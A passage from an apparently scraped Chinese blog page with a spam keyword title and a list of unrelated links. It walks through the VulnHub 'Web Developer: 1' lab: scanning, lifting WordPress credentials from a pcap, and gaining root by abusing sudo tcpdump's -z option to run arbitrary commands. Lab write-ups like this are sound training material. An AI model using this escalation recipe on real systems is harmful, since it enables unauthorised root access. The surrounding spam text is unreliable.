当前位置: 首页 > news >正文

wordpress 调用安徽网站建设优化推广

wordpress 调用,安徽网站建设优化推广,网络工程技术课设报告,公司网络营销推广软件vulnhub:Web Developer: 1 ~ VulnHub 导入靶机,放在kali同网段,扫描 靶机在192.168.114.129,扫描端口 有网站服务,访问 没什么东西,扫目录 真不少,访问一下,也只是一些普通的Wordpr…

vulnhub:Web Developer: 1 ~ VulnHub

导入靶机,放在kali同网段,扫描

image-20240927105502127

靶机在192.168.114.129,扫描端口

image-20240927105531584

有网站服务,访问

image-20240927105614112

没什么东西,扫目录

image-20240927105857018

真不少,访问一下,也只是一些普通的Wordpress的页面,换个字典再扫一次

image-20240927110129801

这次多出来一个ipdata目录

image-20240927110151616

里面有个cap文件,下载

image-20240927110440782

在里面找到了账号密码

webdeveloper:Te5eQg&4sBS!Yr$)wf%(DcAd

登录wordpress

image-20240927110929501

靶机似乎有点问题,我这里跳过获取Wordpress的shell,请自行参考别的wp

webdeveloper:MasterOfTheUniverse

登录

image-20240927113845080

根据sudo -l,我们可以运行tcpdump

image-20240927113925849

查看提权网站的使用方式

COMMAND='ls -al /root'

TF=$(mktemp)

echo "$COMMAND" > $TF

chmod +x $TF

sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF

image-20240927114206130

执行完成后,再开一个终端,执行命令

nc -v -z -n -w 1 127.0.0.1 1

image-20240927114407300

可以看到原来的终端执行了ls -al /root命令,所以我们只需要替换命令就可以查看flag

image-20240927114357740

COMMAND='cat /root/flag.txt'

TF=$(mktemp)

echo "$COMMAND" > $TF

chmod +x $TF

sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF

http://www.mmbaike.com/news/49916.html

相关文章:

  • godaddy 建网站湖北seo推广
  • 网站的缺点有哪些电商运营培训学费多少
  • 企业网站建设的核心是网络推广seo怎么做
  • 营销策划案ppt优秀案例seo服务收费
  • 建设网站的基础知识新媒体营销六种方式
  • 植物网站模板北京网络营销推广公司
  • 亚马逊跨境电商运营佛山seo关键词排名
  • 网站翻页动画效果seo厂家电话
  • 滑县做网站南京seo排名
  • 合肥专业网站建设公司日本粉色iphone
  • 国外做的好的网站宁波关键词优化时间
  • 网站开发报价和开发周期seo教程seo官网优化详细方法
  • 一个公司是否能备案多个网站百度搜索优化关键词排名
  • 一家电子商务网站建设心得谁有恶意点击软件
  • 国家疫情防控最新政策第十版专业seo培训
  • 铜仁做网站公司网络营销成功案例
  • 网站建设公司出路怎么接游戏推广的业务
  • 国际公司和全球公司整站优化包年
  • 张家港微网站一级域名生成二级域名
  • 怎么推广产品最有效滁州网站seo
  • 做网站前期了解客户什么需求微信营销号
  • 临朐网站制作最低价格百度2018旧版下载
  • 网站怎么做百度的关键字如何创建自己的域名
  • 网站本地环境搭建软件深圳全网推互联科技有限公司
  • 建筑网站大全玻璃个人在百度上发广告怎么发
  • 做标签这个网站刷单安全吗百度竞价推广教程
  • 上海网安网站建设网络推广方式
  • 学做衣服上什么网站好亚马逊seo是什么意思
  • 汕头模板建站平台java培训班
  • 郑州做网站和推广哪家好个人网站建站流程